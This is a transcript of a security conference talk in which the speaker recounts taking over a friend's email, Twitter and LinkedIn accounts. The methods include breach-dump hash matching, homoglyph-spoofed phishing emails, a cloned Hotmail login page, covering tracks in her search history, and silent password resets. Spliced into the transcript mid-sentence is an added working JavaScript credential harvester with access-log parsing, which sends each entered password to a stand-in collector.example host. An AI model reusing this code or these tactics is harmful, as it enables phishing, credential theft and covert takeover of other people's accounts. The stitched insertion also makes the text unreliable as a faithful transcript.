maybe i'll try and hack into email first and then i can decide what to do because her email is kind of like you know the the the keys to the kingdom sort of the top of everything if you can hack if you can get into someone's email then you can use the email to reset their twitter and reset their other stuff and get into all their other accounts so i'm going to try and go for that this is what this is what i justified this to myself it was late at night whatever um okay so now i have to get her email password note that i can't get into her email any other way i have to actually know her email password and type it in and log in at the same time as her because if i got into her email any other way by like pretending to be here and resetting it she will get kicked out of it so she has to also still be an email and also not know that i'm also in an email so the only way i can do this is by just getting the password which is what i'm trying to do um there's this great website for getting passwords um called have i been owned owned a lot of controversy on how to pronounce that and uh you left you uh put in an email address and it will tell you which of the like public data breaches they're called that email address appears in so you can put in your email and it will tell you yeah like linkedin got hacked in 2012 and your email was in there so some hacker has your linkedin password and it will tell you that for all the different sites that have been hacked that the all the different ones that this website knows about um clever nowhere does it say that you need to put in your email address so very cleverly i put in her email address and i find that she's at the time of writing um she was only in uh she was in a few the only interesting ones where patreon and tumblr patreon didn't have passwords tumblr was the only one that had passwords in the like data breach thing and so i was like okay cool i know my friend's like password is on the internet now i know it's on this it's 
in this tumblr thing um this is great so now uh the tumblr password dump is something that i just happen to have lying around and so it looks like this it's a big text file and it's just got the email address and then a column and the password hash and hackers are not very good at documenting their stuff and so they don't really say what kind of password hashes they are just a text file i looked around the internet and people seem to think that they're shy one hashes with a static salt and i'm like cool what does that mean and so let me explain what a static salt is um so imagine you're like i don't know a website let's call them tumblr and you're storing like emails and passwords uh this is one where you could do it you could store the email address of the person and you could also just store their password because then when they log in you know whether they typed in the right password because you have their password but then you go to a security conference and they tell you you're not allowed to do that so okay actually you need to hash the passwords so this way you don't store the password you store this like scrambled up version of it and then you can then you don't have to ch and you don't have to um keep a copy of the user's password but you can still check whether they type the right password in so okay now it's drawing password hashes and you're like am i doing it now and people at security conferences are like no this is not good enough you need to do the salting thing now and so now you need to before you hash before you hash the password you need to add a random string to the end of it just in case somebody has a big list of the hash of every possible like eight character string then they could possibly use that to like reverse what your hash was back into the password so you have to add this salt thing to the end and so you go okay okay and so now you're adding this salt and you add all the end of the password it's like this this is called a static sort 
and static means it's the same for all the passwords and so now you're adding the same thing to the end of every single password and the point of this is to prevent somebody with a big list of the hash of every single string from using that big list to reverse your password hashes but do you see the problem here the problem is that these two parts these two users have the same password and because we're adding the same thing to the end of the password the same the same static so the thing that's getting hashed is the same for both of these people in fact they're going to have the same password if and only if they have the same password hash and so even when we hash everything you can see these two these two users have the same password hash you don't know what it is you don't know what the password is but you know these two people have the same password because of the static salt thing uh so why am i telling you all about this static sold thing it's because i don't know what the soft is for the tumbler password dump even though it's the salt it's not meant to be a secret thing it's meant to be like public it's meant to be as public as like the usernames but i don't know what it is because it's not included in the text file because hackers are not good at documenting their stuff um so i'm like okay i really want to i really want to get my friends password out of this but i don't know how um so the first thing i did when i had the list was i searched for my friend's email address and i'm like okay if i grab for her email address i'll get all the lines that have her email address in it which is just the one with their password hash in it i'm like cool but i don't know what this don't know what this password hash goes to i don't know what password this password hash is of so here's the sneaky thing i do uh i search for her password hash in the file not her password just her password hash like an absolute madman because uh well what do you think will happen what do you 
think will happen when i type in her like when i grip for her password it should just be one like it should just be her line right should just have my friend dana's thing there's like 20 people who have the the same have the same password hash right and these people it's like a little pathway book club right they can all get along and these these fun these fun little book enthusiasts all have the same password on tumblr and so this tells me a few things um probably it's not a very good password since all these people have thought of the same one but again i'm very smug but i don't know what it is so i need to find out what it is and so here's what i do i get just the email addresses of those people in the password book club i throw away the password hashes don't know what i don't know what to do with the hash just get those email addresses these are all the people who have the same password as diana and then conveniently did you know that linkedin was also hacked in 2012 and uh dan dana was not in this list because she didn't have linkedin in 2012 but lots of people were and thanks to the hard work and gpu cycles of people in the password cracking community almost all those linkedin passwords are in plain text now they're not just hashes their emails and like you know just passwords you can just look at with your eyes and i was like wow i also just happen to have that lying around and so then i did this thing where i looked up the same people who in the password book club in the tumblr list in the linkedin list and i found most of them not all about 80 of them had the same password as each other on linkedin as well so isn't that really sweet that book club transcends like services um and i thought it was sweet and uh i found that most of them had the password query one and so this is a bit of a there's a bit of like a bit of a jump here but i'm guessing that my friend dana has the same password as all these people on tumblr okay i'm not guessing that's definitely 
true and then i'm guessing that they'll have the same password on linkedin and then i'm guessing that that password is this most frequent one this quote query one thing i'm guessing that that's diana's password and i'm like okay i've done it let's go uh cordy wants down the password i did it i'm hacking let's go it's time to use this thing i got hotmail type in and it's not the right password like that's not a hotmail password it was that was it wasn't it and i was like well damn why did i do all this work why did i go to all these great lengths okay whatever um so then i go to facebook and so i don't just try it on her hotmail i tried on everything i go to facebook and uh it says oh no that's not your facebook password but it's an old password it was your password about five months ago i'm like oh thanks facebook for taunting me i guess i'm too late um but i mean like okay so this did used to be her password she just happens to have changed it recently and i've somehow stumbled upon a person it has more than one password in their life um so i'm like okay fine i guess it's the hard way um which is what i didn't want to have to do so by the way uh this this is what i had planned this is what i thought this like hacking would be like i was going to be like ah it's so easy to hack someone you just look them up and all these lists you have lying around and it's as easy as that and so the rest of this talk will be about how it's not as easy as that always and so i'm like okay i guess i'm going to try and do this fishing thing i'm going to try and trick her into sending me the password because everyone else is doing it it's more work it's way more it's more work because you have to make something custom but like oh well i don't know is this how you do fishing i don't know it's my first time maybe i should do something like this i don't know you don't know that you don't know that it won't work um so now i'm not going to do that i'm going to do this here's the plan i come 
up with i'm going to send her a fake email from microsoft because she has hotmail it has to be microsoft and that email is going to take her to a login screen for hotmail but it's a fake login screen that actually sends me a password and then she'll go to the real hotmail login screen and just kind of keep going as if nothing happened this is my plan i don't know don't whatever and so um but to do this i'm going to need to make a hotmail account to send the email from so i go to i go to make a hotmail account which will let me open a world of benefits and i try to make one that looks like microsoft i try to make a microsoft account team and says no you can't do that presumably because the word microsoft is in the email address and they know i'm not microsoft and so i try to make my first name microsoft and my last name account team and they're like no you can't do that and presumably to stop exactly what i'm trying to do and fair enough however these are my round friends and they're these look like two o's don't they looks like i put two o's in this slide like an absolute fool but actually one of them is an o and one of them is a greek letter omicron which looks a lot like an o to you and me doesn't it but to a computer they're completely different like unicode code points and so like if you just spell microsoft like this with these omicrons then like that doesn't say microsoft but like to you and me it looks like it does and so like does this really work i'm sure you're wondering like surely like surely the billions of dollars at microsoft and the most advanced mines aren't going to be full but no does work yeah it does and so i make this i make this microsoft account team thing and i send it this email which says like i copied this from like a real microsoft email that i got i copied all the like styling and most of the text and it says oh you better log into your account in the next 48 hours or we're gonna lock it um oh please do it or it's gonna be real bad 
this oh boy there's like russians ipad dresses you wouldn't want that i don't know um and so it says like come and log in please um but again this is just an email like that link that that don't lock his account thing at the bottom there has to be a link to something and so i need to make that i need to make a website for that bottom button to link to so okay let's go this is the real what my login screen it was at the time and so i'm gonna uh i need to make a copy of this and so there's another way to make a copy of things there's this hacking tools technique i learned about where stuff have you seen this before step one if you right click on something step two you hit this button and when you hit that inspect element button that's the good stuff i think there are easier ways to copy websites but i always do it this way anyway so here's my copy of the website it looks the same because it is the same um but this time it's on my computer it's on localhost and so now i need to put on the internet somehow um and so i'm like how do i put this i can't link her to localhost how do i put this online and i found this like static hosting company website thing they're not paying me to say this but they have like they let you like host static files on the internet and this is really good because you get a custom subdomain so you can be anything dot aerobatic.io and they give you https for free and it's like two commands or something to do it and no one knows about it so all the good subdomains aren't taken um so like i'm sure it's a good static hosting site but it happens to also be a really good phishing hosting site so um thank you to these people you can use the promo code diana to be immediately reported to the authorities uh this so this is the one i made this is the um the the domain i chose the real hotmail login screen is like the real hotmail login domain is login.live.com and so i could have like made my own domain name and like made it look even more similar but i 
just don't think diana's going to look at this at the the url very much because she's not like a paranoid security person like us so um but then again for some reason login when you go to like a login screen the url doesn't look like that it looks like this it has a bunch of like stuff at the end and so i just added a bunch of stuff at the end like it it doesn't do anything i actually stole it from the google login screen um but whatever okay it's my first time and so here it is this is my fake login screen on the internet now i know it's the same picture but this time on the internet trust me um and so i also add these bonus features to it um the first one is that after she clicks the the login button the submit button it's going to add an image to the page and the image goes to a website i control forward slash diana and then question mark and then plus whatever password is so the reason i'm doing this is to try and steal whatever just trying to steal a password this is like a terrible awful way to do it that you probably shouldn't do but it's really easy so like i'm going to get a request to my website forward slash diana and then plus some password i don't know what this password is so it's going to be a 404 but then in my logs it's going to be a request for a 404 to diana and then the password so i'm just going to be looking at my logs for this diana thing and when it shows up i'll be like ah that's the password and then i make it so that after she clicks the button it waits one second and then goes to the real hotmail login screen the one second way to simulate australian internet speeds anyway here's the email i send it's like you know look out it's something real bad's gonna happen and you only got 48 hours because i'm creating time pressure and i'm doing all the good stuff i've seen random phishing emails do but i kind of just want this to work so come on click click the link and so i send it to her and search your anastasia 48 hours and then 24 hours 
later, nothing happens. I'm looking at my logs and she's not there, so I'm like, she hasn't clicked on it yet. So I send the email again, saying the same thing, but now you only have 48 hours, and now you only have 24 hours, you'd better click it. And then 48 hours later she also doesn't click on it. At this point I'm not actually hacking anyone, I'm just emailing my friend. I'm like, okay, that's a shame, I guess it wasn't an interesting enough email, and fair enough. The thing I learned from this is that people don't really care about emails from Microsoft, about automated emails. I care about emails from people.

Which leads me to the next way I try to do this. She's going to be on the internet, whatever, and she's going to get an email from a recruiter, and the recruiter is going to link her to the same fake login page, and then she's going to go to a Google Doc, and the login page is going to be a login to see a Google Doc. But this is Microsoft, this is Hotmail; Hotmail doesn't have Google Docs. Is there such a thing as Microsoft Google Docs? So I look it up: is that a real thing? And there is, and it's called Cloud Sky something something something. So I'm like, great, and I log into this and make... oh no, I think I make the document in something else and then copy and paste it into this. So now I have a Microsoft Google Doc. You might be wondering what document I made. I made a resume, a fake but convincing-looking resume.

Then I send her... oh no, before I do that, I have to make the person who's going to send it to her. I can't email her from me, I can't email her from a Microsoft account team, so I guess it's going to have to be from this fake person. So I go to the Google login screen (you can put whatever you want in these boxes, it's very good) and I make this person called Kathleen Wheeler, who's a mix of a first name and a last name from a real company that I found. And then I sent her this, which says... this is me writing this, sometimes I sound like I'm a recruiter, I don't really know what it should sound like. I'm saying, hey, I work at this comedy company which you care about (which I looked up earlier on LinkedIn), and somebody has listed you as a reference, somebody has said that they worked with you. Here's the resume, tell us how you know them, blah blah blah, click here for the resume. That link is obviously the one that goes to the fake login screen. And then after all this text being like "can you fill out this form and tell us these things," blah blah blah, that's just to distract from the link. And then it says, also, can you let me know a good time to call you, and the phone number is her phone number, which I found earlier. The reason I put a phone number there is so she knows this is for her; it's not an accident, this person clearly knows who she is. And then I made a sweet email signature at the bottom with a different font and everything. I thought it was really good attention to detail.

So I sent this to her and it totally works. She clicks it, she taps in a password, the whole thing just works flawlessly, and I was like, wow, that was really easy. And then I looked a little bit closer and I'm like, wait a minute, this password that she sent me, that's qwerty1, I already have that one. What? Did I do something wrong? And then I was like, no, wait a minute, here's what I've learned: she does not know [inaudible], that's what it is, which in many ways is the ultimate defense against people. So don't shame her for this. But also, because my fake login screen will just say yes no matter what password you type in, she actually thinks this is a password. And I'm like, whoops, I hope I can fix that after this is all over.

Anyway, instead of giving up, I update my login screen, so now no matter what you type in, it just says "wrong password" the first three times, because my theory is that people who memorize all their passwords just try one, and if it doesn't work they try the other one, and the other one; they just unload all their passwords into the form. I also change it so that if you try qwerty1 the counter doesn't go up, so you can't just type qwerty1 three times. And so then I send her... then she replies, and she's like, no, I haven't worked with this person, which is true, because I don't exist. And then she's like, yeah, you can call me, that's the right phone number. And I'm not going to call her, because I'm not [inaudible]. And then I have a reply being like, oops, that was the wrong resume, for some reason you'd better click on this. This makes no sense, right? If you stop and think about this: "oh, there's another person who also worked with you around the same time but with different dates, and I sent you their resume instead of the other one." That doesn't make any sense, this story doesn't work. But it has the same bait of "somebody says they know you and you have to click to find out who." And so I'm like, please, just click on it anyway, please. And she does, and this time the same thing happens: she clicks on it and she types in a thing, she types the same thing three times, which is this other password, which looks a lot like qwerty1. Oh, also, none of these are real, but they're similar to what they actually were. This one's shifted along by one on the keyboard. I'm like, hmm, okay, what's this password? And so I go to Hotmail and, using my advanced hacking software, Google Chrome, type the password into the Hotmail login screen and press enter, and it totally works. I get into
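To make the fake login page's behaviour concrete, here is an added model of the two mechanics described above: the `<img>` beacon that carries the submitted password to a host the attacker controls (where it shows up as a 404 in the access log), and the later change that refuses the first three distinct passwords without counting repeats, then redirects to the real login page after one second. This is editor-written example code, not the speaker's page; the host names, element ids, log format and sample log lines are all constructed for illustration.

```javascript
// Added example, not the speaker's code. Host names, selectors and the log
// lines below are assumptions made for illustration only.

const EXFIL_BASE = 'https://collector.example/diana'; // hypothetical attacker-controlled host
const REAL_LOGIN = 'https://login.live.com/';         // where the victim is sent afterwards
const REDIRECT_DELAY_MS = 1000;                       // the talk's one-second pause
const REJECT_FIRST = 3;                               // distinct passwords refused before "success"

// Tracks which distinct passwords have already been refused. A repeat of one of
// them is refused again without advancing the count, so retyping the same
// (possibly already-known) password three times does not get through.
function createHarvester({ exfilBase = EXFIL_BASE, rejectFirst = REJECT_FIRST } = {}) {
  const refused = new Set();
  return {
    submit(password) {
      // Every submission is beaconed: the password rides in the query string of an
      // image request that 404s on the server but still lands in its access log.
      const beaconUrl = `${exfilBase}?${encodeURIComponent(password)}`;
      let accepted = false;
      if (refused.size >= rejectFirst) {
        accepted = true;               // quota of refusals spent: let this one "succeed"
      } else if (!refused.has(password)) {
        refused.add(password);         // new password: refuse it and count it
      }                                // repeated password: refuse it, count unchanged
      return { beaconUrl, accepted, refusedSoFar: refused.size };
    },
  };
}

// Browser wiring for the copied login form (assumed selectors). Guarded so the
// file also loads under Node for the log-parsing part below.
function attachToForm(form, harvester, win) {
  form.addEventListener('submit', (ev) => {
    ev.preventDefault();
    const password = form.querySelector('input[type=password]').value;
    const { beaconUrl, accepted } = harvester.submit(password);
    const img = win.document.createElement('img');
    img.src = beaconUrl;               // fires the GET that carries the password
    form.appendChild(img);
    if (accepted) {
      win.setTimeout(() => { win.location.href = REAL_LOGIN; }, REDIRECT_DELAY_MS);
    } else {
      form.querySelector('#error').textContent = 'Wrong password'; // hypothetical element id
    }
  });
}
if (typeof document !== 'undefined') {
  attachToForm(document.querySelector('form'), createHarvester(), window);
}

// Attacker side: pull passwords out of the 404 lines of a Combined-Log-Format access log.
const BEACON_LINE = /"GET \/diana\?([^ "]*) HTTP\/1\.[01]" 404 /;
function passwordsFromLog(logText) {
  const found = [];
  for (const line of logText.split('\n')) {
    const m = BEACON_LINE.exec(line);
    if (m) found.push(decodeURIComponent(m[1]));
  }
  return found;
}

// Constructed sample log (not real traffic): two beacons from the victim, one unrelated 404.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2017:19:02:11 +1000] "GET /diana?qwerty1 HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Oct/2017:19:02:40 +1000] "GET /diana?p%40ssw0rd HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Oct/2017:19:05:02 +1000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
].join('\n');
```

Two things worth noticing from the model. The password travels in a URL, so it is written not only to the attacker's log but to any CDN, proxy or browser history in between, which is why the talk calls this a terrible way to do it. And everything here depends on the victim typing into a form on the wrong origin: a password manager that only fills on the registered domain would have offered nothing on the aerobatic.io copy, which is a stronger check than expecting someone to read the URL.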
her email. And I'm like, it's as easy as that, everybody, see, it's simple. Okay, so I got an email password, but now what do I do? I try the same password on everything and it doesn't work. I'm like, great, this person has three passwords in their life. And then she replies, being like, no, I haven't worked with this person either, why are you doing this, what's happening? And I reply just being like, don't worry about it, don't stress about it, I'll just handle it, please don't email me anymore, please just forget about this. And she does; she doesn't reply. So I'm like, great.

Meanwhile, I log into her email and I want to search for more passwords so I can log into more stuff. So I click on the search bar thing and it shows me her last five searches, and the last five searches aren't anything interesting. But I want to search for "password" and other things, and if I do that, then she'll see it in her search history, right? So I write down the last five things she searched for, then search for my stuff, and then search for those things again in reverse, so it looks exactly the same, because it only shows the last five. Microsoft knows what I've done, but I'm doing it anyway. And it totally works, but I didn't find any new passwords. I found a lot of passwords I already had, but I didn't find any new passwords, and I was like, fine, whatever.

So this is the end of the talk, I guess, that's it... No, it's obviously not the end, geez. The talk is called Operation Luigi, and I'm already in my friend's email. It'd be a real shame to just leave it at that, a real shame to not do anything with that. So here's what Operation Luigi is, here's what we need to do. First thing is get into her Twitter. Second thing is to not lock her out of her Twitter, because she needs to be in there too. And also don't let her know that I'm in her stuff; she doesn't have to know that I'm in her Twitter.

So here's how I do it. I go to Twitter and I'm like, hey, I forgot my password, until it lets me reset it. Because I'm in her email now, I can reset the password; it'll send me the email and I can click it. So I changed her Twitter password to qwerty1, because this is the password that I think she thinks her password is. There are a few emails, blah blah blah, and I wait for her to log in, because I need her to log in so I know that she's actually typed qwerty1 and she's back in her own account. I wait a while and eventually she actually logs in, and I'm like, great, it works. She retweeted a picture of a dog and I was like, yes, okay.

So then I do the exact same thing with LinkedIn as I did with Twitter, and I try to change the LinkedIn password to qwerty1 as well, but it doesn't let me, presumably because I got qwerty1 from the LinkedIn password dump, so they know it's bad. Then there's a little box at the bottom which says "require all devices to sign in with new password," which is like, would you like to sign out all your other devices? And I'm like, absolutely not. Thank you, LinkedIn, for giving me this option. It's unchecked by default, so I can just change her password without even signing her out. And so I just do that, and then I log in.

So okay, now what? Let me explain. This picture of Obama is here because I can't show you Diana's real pictures. I'm going to show you what I did to her real profile pictures, but with pictures of Obama. I don't know, just go with it. So here's what her Twitter picture was, and I changed it to be like this. I don't know if you can tell, there's a slightly transparent Luigi there. She also had a LinkedIn picture, and I changed the LinkedIn picture to have another Luigi on it. Can you see it? And so I just left it there for, I don't know, weeks. I just left it there and no one said anything. I thought she might have noticed then, but this is sort of proof that I got somewhere. And so nothing happened, so I was like, okay, well, that was Operation Luigi, because it's not over: the remainder of this talk will be about Operation Waluigi. I came up with this a long time ago, back when this meme was new. Anyway, whatever. Waluigi, let's go.

So I changed her LinkedIn bio to be the entire Wikipedia page for Luigi, and when I do this, LinkedIn says her profile strength is "advanced." So thank you, LinkedIn, thank you for being there for me this entire talk. Anyway, I changed her Twitter to be this. I want to make it super obvious; I want her to know that I'm there, I want to be caught now. I'm like, hello, notice me, I'm very loud. I tweet this from her account, just go for it, and she's online at the same time because it's like 7pm, and she replies and she says "omg" to this thing and she says, "I've been hacked, my dudes." But then, because I'm also logged in at the same time, I reply as her, saying, "oh no no, it just seemed like the right thing to do at the time." Anyway, then I tweet this, then I create this, and I keep doing things until she messages me. I tweet longings for the days of this sweet lad and keep tweeting things, and eventually she messages me and is like, oh my gosh, my Twitter, is this you? And I'm like, yes, it's me, don't worry, nothing bad's happening, I'll stop now. Congratulations, I guess you got me.

And here's what happened after that. She loves her new Waluigi life so much that she goes and changes her Facebook to be Waluigi-themed, even though I didn't even touch it. She gets really into Luigi
culture. I'm not going to read this, but she really got into it. And she also asked me, like, wow, how do I not get hacked? What did I do wrong? I'm like, well, you didn't do anything wrong, but this is kind of a question that people ask a lot, right? People ask security people, how do I stay safe, what should I be doing online? And these are just regular people who ask this, not security people; they're just normal people, they're not weird like us. They say, oh, how do I stay safe? And sometimes the kind of answers they hear from security people are like, oh, you've got to do all these things and live in a submarine and never go anywhere, and you've got to get all this advanced multi-factor, YubiKeys or whatever. There are other things you can say.

So here's what I told her. I was like, well, listen, it's up to you, right? There are things you can do to stay safe, but they involve investing more time and effort. It's up to you how much you invest, it's up to you how much you care about this. Maybe you don't care, and you're fine with getting hacked; that's okay, that's a valid way to live your life. And so I help her set up two-factor auth on her email, because I'm about to do this blog post and publish a guide on how to hack her, so I don't want it to be repeatable. So I help her set up two-factor auth, so now she'll get a code on her phone, which would have been way harder for me to get past, because it's way harder to get past two factors. You have to, I don't know, phish the two-factor auth code, or socially engineer the phone company; too hard. And she was very happy that it wasn't that hard, she was very happy that she could just do this and it wasn't much extra effort for her, because this is the lowest-effort, highest-security-value thing I think she could have done. And so she has a little app like this, you know, and she's like, yeah, now I can just type in these codes.

These backup codes are kind of a trap though, and I kind of warned her about only using the app, because see that button that's like "save as a text file" or "keep these codes somewhere safe"? No one clicks those buttons. Everyone's just like, yeah, whatever, close. No one keeps these backup codes, and so that's one of the reasons it's good to have SMS as a backup.

Anyway, in conclusion, I just talked about Luigi for a long time, so I hope you liked it. Oh, the last thing is, you might be wondering where I got these. Before, I was like, oh, I had these lying around. You're probably wondering where the LinkedIn and Tumblr password hashes actually came from. Thank you very much. Thank you.

Hello. Thank you, Alex, for that talk. We have a lovely cup for you. Thank you. Can Melissa, oh sorry, Alyssa, come up to the stage? Awesome, thanks.